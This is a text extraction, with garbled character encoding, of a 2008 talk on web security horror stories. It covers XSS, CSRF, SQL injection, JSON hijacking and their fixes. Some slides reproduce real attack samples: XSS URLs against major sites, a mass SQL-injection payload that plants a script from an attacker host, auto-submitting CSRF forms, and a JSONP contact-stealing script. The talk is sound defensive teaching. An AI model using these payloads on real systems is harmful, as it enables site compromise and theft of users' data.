Keeping your web application secure is an ongoing process - new classes of vulnerabilities are discovered with surprising frequency, and if you don't keep on top of them you could be in for a nasty surprise. This talk will discuss both common and obscure vulnerabilities, with real-world examples of attacks that have worked against high profile sites in the past.
1. Web Security
Horror Stories
The Dire
ctorās C
ut
Simon Willison, 26th October 2008
2. The edited version
ā¢ On Friday, I spent 15 minutes introducing:
ā¢ XSS
ā¢ CSRF / login CSRF
ā¢ SQL injection
ā¢ Clickjacking
ā¢ I promised this talk would provide ļ¬xes
3. XSS
ā¢ Cross-site scripting
ā¢ Attacker injects JavaScript code in to your
site
ā¢ Amazingly common
ā¢ A single XSS hole on your domain
compromises your security, entirely
4. Alex Russell:
If you are subject to an XSS,
the same domain policy
already ensures that youāre
fād. An XSS attack is the
ārootā or āring 0ā attack of
the web.
http://www.sitepen.com/blog/2007/01/07/when-vendors-attack-ļ¬lm-at-11/
5. The same origin policy
āThe same origin policy prevents a
document or script loaded from one
origin from getting or setting properties
of a document from another origin.
This policy dates all the way back to
Netscape Navigator 2.0.ā
https://developer.mozilla.org/en/Same_origin_policy_for_JavaScript
6. Why?
ā¢ Without the same origin policy, I could load
your site in a frame, iframe or popup window
from my site...
ā¢ ... and steal data from it
ā¢ ... or rewrite it with my own modiļ¬cations
ā¢ evil.hax.ru should not be able to read
secret-wiki.bigco.intl
ā¢ XMLHttpRequest has the same policy
7. Things I can do if you
have an XSS hole
ā¢ Steal your usersā cookies and log in as them
ā¢ Show a fake phishing login page on your site
ā¢ Embed malware and drive-by downloads
ā¢ Perform any action as if I was your user
8. Two categories of XSS
ā¢ Reļ¬ected
ā¢ I embed my JS in a link to your site and
trick your user in to following it
ā¢ Persistent
ā¢ I get my XSS in to your siteās database
somehow so that it shows up on your pages
9. http://www.facebook.com/srch.php?nm=xss%00<script>alert('XSS')</script>
http://www.youtube.com/edit_playlist_info?p='%22%3E%3Cscript%
20src=http://ckers.org/s%3E
http://groups.google.com/group/rec.sport.pro-wrestling/browse_thread/
thread/1ab38554971acfc9')&+eval
(alert(document.cookie))&+eval('?tvc=2
http://search.live.com/images/results.aspx?
q=1&ļ¬rst=21&FORM=PEIRquot;><script>alert('securitylab.ru')</script>
All from http://xssed.com/
14. ā¢ Wrong:
ā¢ $sql = quot;select * from users where
username = 'quot; . $username . quot;'quot;;
ā¢ Right:
ā¢ $results = db_query(quot;select * from
users where username = ?quot;,
$username);
15. Mass XSS via SQL injection
DECLARE @T varchar(255), @C varchar(255);
DECLARE Table_Cursor CURSOR FOR
SELECT a.name, b.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype = 'u' AND
(b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167);
OPEN Table_Cursor;
FETCH NEXT FROM Table_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0) BEGIN
EXEC(
'update [' + @T + '] set [' + @C + '] =
rtrim(convert(varchar,[' + @C + ']))+
''<script src=http://evilsite.com/1.js></script>'''
);
FETCH NEXT FROM Table_Cursor INTO @T, @C;
END;
CLOSE Table_Cursor;
DEALLOCATE Table_Cursor;
http://hackademix.net/2008/04/26/mass-attack-faq/
16. Preventing XSS
ā¢ Use a tool that escapes everything on output
ā¢ Only unescape stuff that you know is safe
and you know contains markup you want to
execute
ā¢ IE 8 has an XSS ļ¬lter; this is irrelevant to
developers
ā¢ httpOnly cookies are mostly a waste of time
17. HTML āsanitisationā
ā¢ My users need to be able to add links
and basic styles to their submissions
ā¢ āIāll let them use HTML and remove
anything nastyā
ā¢ An extremely common vector for XSS
ā¢ MySpace
ā¢ LiveJournal
ā¢ Almost anyone else who tries
20. A social network worm
ā¢ XSS hole in MySpaceās HTML ļ¬lter
ā¢ When you viewed Samyās proļ¬le...
ā¢ JS makes you add him as a friend
ā¢ JS uses XMLHttpRequest to add his
exploit to YOUR proļ¬le as well
24. Things to remember
ā¢ Whitelist, donāt blacklist
ā¢ Youāre programming against undocumented
parsing routines in closed-source browsers
ā¢ Distrust any library that doesnāt have a unit test
suite a mile long
ā¢ http://ha.ckers.org/xss.html
ā¢ http://code.google.com/p/html5lib/ is promising
26. The UTF-7 hole
ā¢ Googleās 404 pages used to be served
without a character set speciļ¬ed in the
HTTP headers or <head> section
ā¢ Without those hints, IE inspects the ļ¬rst
4096 bytes to āguessā which encoding
is used
ā¢ XSS attacks encoded as UTF-7 were
shown on the page and executed by IE
http://shiļ¬ett.org/blog/2005/dec/googles-xss-vulnerability
27. You canāt trust CSS either
ā¢ Want to let your users include their own
stylesheet?
ā¢ HTC in IE and XBL in Mozilla are both
vectors for JavaScript attacks
ā¢ LiveJournal were attacked with this
ā¢ A āposition: absoluteā hack was used to
steal 30,000 MySpace passwords last year
http://community.livejournal.com/lj_dev/708069.html
http://www.securiteam.com/securitynews/6O00M0AHFW.html
29. Bill Zeller:
āWeāve found CSRF vulnerabilities in
sites that have a huge incentive to
do security correctly. If youāre in
charge of a website and havenāt
speciļ¬cally protected against CSRF,
chances are youāre vulnerableā
31. How does it work?
ā¢ It pre-fetches the links on a page in to a
cache, so theyāre already loaded when you
click on them
ā¢ Links like http://app.example.com/
delete.php?id=5
32. How does it work?
ā¢ It pre-fetches the links on a page in to a
cache, so theyāre already loaded when you
click on them
ā¢ Links like http://app.example.com/
delete.php?id=5
35. So use POST
ā¢ You can't create a page that
automatically posts to another site, can
you?
36. POST will not save you
<form action=quot;http://app.example.com/delete.phpquot;
method=quot;POSTquot;>
<input type=quot;hiddenquot; name=quot;idquot; value=quot;1quot;>
<input type=quot;submitquot; value=quot;More kittens please!quot;>
</form>
fofurasfelinas: http://www.ļ¬ickr.com/photos/fofurasfelinas/9724483/
37. Or do it with JavaScript
<div style=quot;display: nonequot;>
<form action=quot;http://app.example.com/delete.phpquot;
method=quot;POSTquot;>
<input type=quot;hiddenquot; name=quot;idquot; value=quot;1quot;>
</form>
</div>
<script>document.forms[0].submit()</script>
Put this in a hidden iframe and your victim won't even
know it happened.
38. The Digg exploit
ā¢ A few years ago, Digg had no CSRF
protection on their ādigg thisā button
ā¢ Self-digging pages!
http://ha.ckers.org/blog/20060615/a-story-that-diggs-itself/
39. The Gmail ļ¬lter hack
http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/
40. āWe believe this is the ļ¬rst CSRF
vulnerability to allow the transfer of funds
from a ļ¬nancial institution.ā
http://www.freedom-to-tinker.com/blog/wzeller/
popular-websites-vulnerable-cross-site-request-
forgery-attacks
41. Preventing CSRF
ā¢ You need to distinguish between form
interactions from your user on your site,
and form interactions from your user on
some other site
ā¢ Referrer checking is notoriously
unreliable
ā¢ Solution: include a form token (Yahoo!
calls this a ācrumbā) proving that the
post came from your site
43. Crumbs
ā¢ Should be unique per user (or one user
can use their crumb to attack another)
ā¢ Hence should be tied to the userās
session or login cookie
ā¢ Should be changed over time
ā¢ Quick and dirty: use sha1(salt + userās
session ID + timestamp) as the crumb
44. Protecting the crumb
ā¢ Your crumb is now the only thing
protecting you from CSRF attacks
ā¢ This is why XSS is āring 0ā for the Web
ā¢ With XSS, I can steal your crumb and
run riot across your site
ā¢ XSS holes are automatically CSRF holes
45. Crumbs and Ajax
ā¢ Ajax can set HTTP headers; regular forms canāt
ā¢ Ajax requests must be from the same domain
ā¢ So X-Requested-By: XMLHttpRequest can only
come from your own site
ā¢ You can skip your crumb checking for requests
that include that custom header
46. Login CSRF
ā¢ Most login forms skip CSRF protection
ā¢ Create a throw-away PayPal account
ā¢ Use CSRF to log someone in as āyouā
ā¢ Hope that they add their credit card or
bank details
ā¢ Log in later and steal all of their money!
61. crossdomain.xml
<cross-domain-policy>
<allow-access-from domain=quot;*quot; />
</cross-domain-policy>
Putting this at example.com/crossdomain.xml allows Flash applets
on other sites to read your pages and steal your crumbs
Flash can even fake an X-Requested-With: XMLHttpRequest header
Thatās why Flickr use api.ļ¬ickr.com/crossdomain.xml instead
62. crossdomain.xml
<cross-domain-policy>
<allow-access-from domain=quot;*quot; />
</cross-domain-policy>
Putting this at example.com/crossdomain.xml allows Flash applets
on other sites to read your pages and steal your crumbs
Flash can even fake an X-Requested-With: XMLHttpRequest header
Thatās why Flickr use api.ļ¬ickr.com/crossdomain.xml instead
64. The PDF hole
ā¢ In January 2007, an XSS hole was found
in the Adobe PDF reader itself
ā¢ It could execute JavaScript in the
context of the current domain
ā¢ Any sites hosting .pdf ļ¬les for download
were vulnerable
http://shiļ¬ett.org/blog/2007/jan/adobe-pdf-xss-vulnerability
65. You canāt secure your site
100%, because thereās
always a chance a browser
or plugin will screw things
up for you
68. ā¢ JSONP lets you opt-in to sharing your
siteās data with other sites using JavaScript
ā¢ ... so make sure itās data you want to share
69. Stealing Google contacts
<script>
function google(a){
var emails;
for(i=1;i<a.Body.Contacts.length;i){
alert(a.Body.Contacts[i].Email);
}
emails = quot;</ol>quot;
document.write(emails);
}
</script>
<script src=quot;http://docs.google.com/data/contacts?
out=js&show=ALL&psort=Affinity&callback=google&max=99999quot;>
</script>
http://blog.adamjacobmuller.com/gmail.txt
http://www.cyber-knowledge.net/blog/2007/01/01/gmail-vulnerable-to-contact-list-hijacking/
70. Jeremiah Grossman:
āIf any JSON feed containing
user-sensitive information is
wrapped with a call-back and
has a predictable URL... then
that data is at riskā
http://jeremiahgrossman.blogspot.com/2007/01/gmail-xsrf-json-call-back-hackery.html
71. Regular JSON?
ā¢ Thatās not secure either
ā¢ In old versions of Firefox, you can redeļ¬ne
the Array constructor to grab the data
ā¢ If your JSON object is an array, the data
can be grabbed using <script src=quot;your-
data-herequot;>
http://directwebremoting.org/blog/joe/2007/03/05/json_is_not_as_safe_as_people_think_it_is.html
72. Secure JSON
Use { } as the root, not [ ]
If youāre paranoid about future similar
problems, use an idiom like this one:
while (true) {
{quot;jsonquot;: quot;goes herequot;}
}
73. And if that wasnāt enough
āMore than 70% of people would reveal
their computer password in exchange for
a bar of chocolate, a survey has found.ā
http://news.bbc.co.uk/1/hi/technology/3639679.stm
ā¢ We have a shared responsibility to teach people
better online security behaviour
ā¢ Donāt teach our users to be phished!